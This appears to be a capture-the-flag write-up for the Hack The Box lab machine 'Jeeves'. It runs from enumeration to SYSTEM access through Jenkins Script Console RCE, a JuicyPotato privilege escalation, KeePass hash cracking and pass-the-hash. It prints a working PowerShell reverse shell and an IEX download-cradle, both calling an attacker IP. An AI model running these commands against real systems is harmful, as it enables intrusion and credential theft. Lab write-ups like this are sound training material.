JEEVES

PRIMARY CATEGORY → MEDIUM

Summary

• Listing SMB Shares with Netexec
• Directory Fuzzing using Ffuf
• RCE in Jenkins Control Panel through its Script Console
• LPE: Abusing the SeImpersonate Privilege using JuicyPotato
• Obtaining a Crackable Hash from a Keepass database file with keepass2john
• Cracking a Hash using Hashcat
• Playing with Alternate Data Stream (ADS) to get the root.txt flag

---

Setup

Directory creation with the Machine’s Name

mkdir Jeeves && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

mkdir {Scans,Data,Tools}

---

Recon

OS Identification

First, proceed to identify the Target Operative System. This can be done by a simple ping taking into account the TTL Unit

The standard values are →

• About 64 → Linux
• About 128 → Windows

ping -c1 10.129.228.112

Command Output

PING 10.129.228.112 (10.129.228.112) 56(84) bytes of data.
64 bytes from 10.129.228.112: icmp_seq=1 ttl=127 time=51.2 ms
 
--- 10.129.228.112 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 51.166/51.166/51.166/0.000 ms

As mentioned, according to the TTL, It seems that It is a Windows Target

Port Scanning

General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG Jeeves.allPorts 10.129.228.112

Jeeves.allPorts

# Nmap 7.94SVN scan initiated Tue Dec 16 18:33:27 2025 as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG Jeeves.allPorts 10.129.228.112
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.129.228.112 ()	Status: Up
Host: 10.129.228.112 ()	Ports: 80/open/tcp//http///, 135/open/tcp//msrpc///, 445/open/tcp//microsoft-ds///, 50000/open/tcp//ibm-db2///	Ignored State: filtered (65531)
# Nmap done at Tue Dec 16 18:33:53 2025 -- 1 IP address (1 host up) scanned in 26.48 seconds

Open Ports →

80, 135, 445 and 50000

Comprehensive Scan

We can apply a little filter to the Jeeves.allPorts file to extract the ports and conduct a more comprehensive scan on them by extracting the services and their version running on each port and also executing some default scripts to gather more information

Note that this scan is also exported to have evidence at hand

nmap -p$( grep -ioP --color -- '\s\d{1,5}(?=/open)' Jeeves.allPorts | xargs | sed 's@\s@,@g' ) -sCV -v -n -Pn --disable-arp-ping -oN Jeeves.targeted 10.129.228.112

Jeeves.targeted

# Nmap 7.94SVN scan initiated Tue Dec 16 18:34:19 2025 as: nmap -p80,135,445,50000 -sCV -v -n -Pn --disable-arp-ping -oN Jeeves.targeted 10.129.228.112
Nmap scan report for 10.129.228.112
Host is up (0.051s latency).
 
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2025-12-16T22:34:32
|_  start_date: 2025-12-16T22:26:29
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5h00m00s, deviation: 0s, median: 5h00m00s
 
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 16 18:35:06 2025 -- 1 IP address (1 host up) scanned in 47.35 seconds

139, 445 - SMB

This time there are not many open ports for a Windows machine. As always, we will start listing the available shares in the target

But first of all, let’s gather some interesting information about the target such as →

• Hostname

• Domain name

• SMB Signing Status

• SMBv1 Support

nxc smb 10.129.228.112

Command Output

SMB         10.129.228.112  445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)

Regarding this target, the only interesting data is the hostname and the SMBv1 support. The rest does not matter i.e. It is not a domain-joined machine and we cannot perform any type of NTLM Relay as it is the only active host on the network besides us and Reflective Relay was patched quite a while ago

So, let’s add the hostname along with its IP Address to the /etc/hosts

printf "%s\t%s" "10.129.228.112" "JEEVES" >> /etc/hosts

/etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  parrot
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
 
# Custom Local Lab
192.168.1.133   4l3x-pc
#192.168.1.100   dc01 DC01 dc01.lab.local lab.local
192.168.1.142   ws01  ws01.lab.local
 
# HTB Machines
10.129.228.112	JEEVES

We do not have any valid credentials, so we will carry out several authentications such as Guest, Null and Random authentication to see if we can get an entry point

Null Authentication

nxc smb JEEVES --username '' --password '' --shares

Command Output

SMB                      10.129.228.112  445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB                      10.129.228.112  445    JEEVES           [-] Jeeves\: STATUS_ACCESS_DENIED 
SMB                      10.129.228.112  445    JEEVES           [-] IndexError: list index out of range
SMB                      10.129.228.112  445    JEEVES           [-] Error enumerating shares: Error occurs while reading from remote(104)

Guest Authentication

nxc smb JEEVES --username 'guest' --password '' --shares

Command Output

SMB                      10.129.228.112  445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB                      10.129.228.112  445    JEEVES           [-] Jeeves\guest: STATUS_ACCOUNT_DISABLED 

Random Authentication

nxc smb JEEVES --username 'anyRandomUser' --password '' --shares

Command Output

SMB                      10.129.228.112  445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB                      10.129.228.112  445    JEEVES           [-] Jeeves\anyRandomUser: STATUS_LOGON_FAILURE 

We get nothing with all the above authentication methods. Let’s move on to the HTTP-related ports

80 - HTTP

First, we gather the web technologies running behind the web application

whatweb 'http://10.129.228.112'

Command Output

http://10.129.228.112 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[Microsoft-IIS/10.0], IP[10.129.228.112], Microsoft-IIS[10.0], Title[Ask Jeeves]

There is nothing interesting apart from the fact that it is an IIS Web Server, which is to be expected as it is a Windows machine

When we visit the web application from the browser, the following content is displayed

Zoom in

There is a search bar

If we inspect the source code of this HTLM file, we see that the form related to the search bar always sends the input data to another HTML file called error.html

Zoom in

But this HTML file simply loads a picture of a MSSQL error

Zoom in

It seems that everything about this web application is a rabbit hole

Let’s move to the remaining HTTP port

50000 - HTTP

Again, let’s start by gathering the web technologies of this application. This time, let’s take a look at Wappalyzer instead of running whatweb

Zoom in

It seems that the server-side programming language is Java, which is usual when Jetty is running as a web server behind the web application, as is the case here

Zoom in

The main page gives us a 404 error, let’s fuzz some directories and see if we get any results

ffuf -v -t 200 -w /usr/share/seclist/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://10.129.228.112:50000/FUZZ'

Command Output

...<SNIP>...
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 51ms]
| URL | http://10.129.228.112:50000/askjeeves
| --> | http://10.129.228.112:50000/askjeeves/
    * FUZZ: askjeeves
 
:: Progress: [220545/220545] :: Job [1/1] :: 3861 req/sec :: Duration: [0:01:02] :: Errors: 0 ::

And we got a hit!

If we visit the above URL, we land on a Jenkins control panel with a type of unauthenticated access. It seems that it is not necessary to log in to interact with all the features that this control panel usually offers

Zoom in

So, this is a quick win for us

We can leverage the Script Console feature of Jenkins to execute system commands as the service account running the web application

That said, got to Manage Jenkins → Script Console

Zoom in

We can verify that we can run system commands

Zoom in

---

Shell as Web User

Therefore, let’s proceed as follows to get a reverse shell

Getting the Reverse Shell

Nishang’s Powershell TCP One line

curl --silent --location --request GET "https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1" --output rev.ps1

nvim !$

rev.ps1

$client = New-Object System.Net.Sockets.TCPClient('10.10.15.229',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Setting up an HTTP Server

We set up an HTTP server with python to share the above resource

python3 -m http.server 8080

Running the Payload

All that remains is to run the following command on the Jenkins’ Script Console

powershell.exe -Command IEX (New-Object Net.WebClient).downloadString('http://10.10.15.229:8080/rev.ps1')

Zoom in

And we get a shell as kohsuke. As usual, the user.txt flag is located in the Desktop folder

Get-Content 'C:\Users\kohsuke\Desktop\user.txt'

---

Privesc - Unintended way

Initial Non-Privileged User → Kohsuke

As any standard service account, it has the SeImpersonatePrivilege privilege enabled

whoami /priv

Command Output

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

This means that an operator could perform a pretty easy LPE by uploading and running certain potato binaries, such as JuicyPotato, in order to run any process as LOCAL SYSTEM

So first, let’s download the JuicyPotato binary

JuicyPotato

curl --silent --location --request "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe" --output juicypotato.exe

Next, we set up another HTTP server to share the downloaded resource

python3 -m http.server 8080

And we download the latter from the target shell

curl 'http://10.10.15.229:8080/juicypotato.exe' -o juicypotato.exe

After that, set up a TCP listener on the port specified in the rev.ps1 script we created earlier

rlwrap -CaR nc -nlvp 4444

Keep in mind that we must leave the HTTP server we launched running in order to request the reverse shell script (rev.ps1) from the target and interpret it with IEX

The last step would be running the binary from the target as follows →

Note that it is the same Reverse Shell method we used in Jenkins’ Script Console

.\juicypotato.exe -t * -p cmd.exe -a "/c powershell.exe -Command IEX (New-Object Net.WebClient).downloadString('http://10.10.15.229:8080/rev.ps1')" -l 1337

Command Output

Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
......
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
 
[+] CreateProcessWithTokenW OK

And we get another shell! This time as the LOCAL SYSTEM account 💀

whoami

Command Output

nt authority\system

---

Privesc - Intended way

Initial Non-Privileged User → Kohsuke

The current user does not belong to any interesting local group

whoami /groups

Command Output

 
GROUP INFORMATION
-----------------
Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288

Inspecting the content of its home directory, located at C:\Users\kohsuke, we find out the following keepass database file in the Documents folder

dir -Recurse -Force -Path 'C:\Users\kohsuke\Documents'

Command Output

    Directory: C:\Users\kohsuke\Documents
 
 
Mode                LastWriteTime         Length Name                                                                  
d--hsl        11/3/2017  10:50 PM                My Music                                                              
d--hsl        11/3/2017  10:50 PM                My Pictures                                                           
d--hsl        11/3/2017  10:50 PM                My Videos                                                             
-a----        9/18/2017   1:43 PM           2846 CEH.kdbx                                                              
-a-hs-        11/3/2017  11:15 PM            402 desktop.ini   

We can transfer this file to our attack machine and run keepass2john to extract a crackable hash from the .KDBX file

The transfer can be carried out via SMB

• From the Attacker⚔️

smbserver.py -smb2support -user 4l3xbb -password 4l3xbb smbFolder "$( pwd )"

• From the Target🎯

net use X: \\10.10.15.229\smbFolder /user:4l3xbb 4l3xbb

Copy-Item -Path 'C:\Users\kohsuke\Documents\CEH.kdbx' -Destination X:

Let’s extract the hash and try to crack it

keepass2john CEH.kdbx > keepass.hash

keepass.hash

CEH:$keepass$*2*6000*0*1af405cc00f9...<SNIP>...

john --wordlist=/usr/share/wordlists/rockyou.txt keepass.hash

Command Output

Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1       (CEH)     
1g 0:00:00:12 DONE (2025-12-16 21:39) 0.07812g/s 4300p/s 4300c/s 4300C/s morochita..marshallmathers
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

And we have obtained the password for the Keepass database file! 💪🏻

Let’s use KeepassXC to open the latter

keepassxc CEH.kdbx &> /dev/null & disown

We have a bunch of entries

Zoom in

But after trying them all for the user Administrator, as it is the only existing user account along with kohsuke, the valid one is the password of the Backup Stuff entry, which is a NTLM hash

We can validate it as follows

nxc smb JEEVES --username 'Administrator' --hash 'e0fb1fb85756c24235ff238cbe81fe00'

Command Output

SMB                      10.129.228.112  445    JEEVES           [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB                      10.129.228.112  445    JEEVES           [+] Jeeves\Administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)

And it is the NT Hash for the Administrator user. Therefore, let’s connect remotely to the target via SMB

psexec.py -hashes ':e0fb1fb85756c24235ff238cbe81fe00' 'JEEVES/Administrator@JEEVES'

Command Output

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Requesting shares on JEEVES.....
[*] Found writable share ADMIN$
[*] Uploading file zHxnWbrP.exe
[*] Opening SVCManager on JEEVES.....
[*] Creating service JgBY on JEEVES.....
[*] Starting service JgBY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32> 

The only thing left to do is to grab the content of the root.txt flag. So, let’s list the content of the C:\Users\Administrator\Desktop directory

dir 'C:\Users\Administrator\Desktop'

Command Output

Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 Directory of C:\Users\Administrator\Desktop
 
11/08/2017  09:05 AM    <DIR>          .
11/08/2017  09:05 AM    <DIR>          ..
12/24/2017  02:51 AM                36 hm.txt
11/08/2017  09:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   2,655,072,256 bytes free

And we have a file called hm.txt instead of the usual root.txt with the following content

The flag is elsewhere.  Look deeper.

In that moment, the Alternate Data Stream came to mind

So, we can list other data streams corresponding to a file as follows

dir /r 'C:\Users\Administrator\Desktop'

Command Output

Volume in drive C has no label.
 Volume Serial Number is 71A1-6FA1
 
 Directory of C:\Users\Administrator\Desktop
 
12/24/2017  02:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
               1 File(s)             36 bytes
               0 Dir(s)   2,655,076,352 bytes free

And here it is! There is an ADS called root.txt within the hm.txt file

more < "C:\Users\Administrator\Desktop\hm.txt:root.txt"

Its content must be the flag we were looking for 😊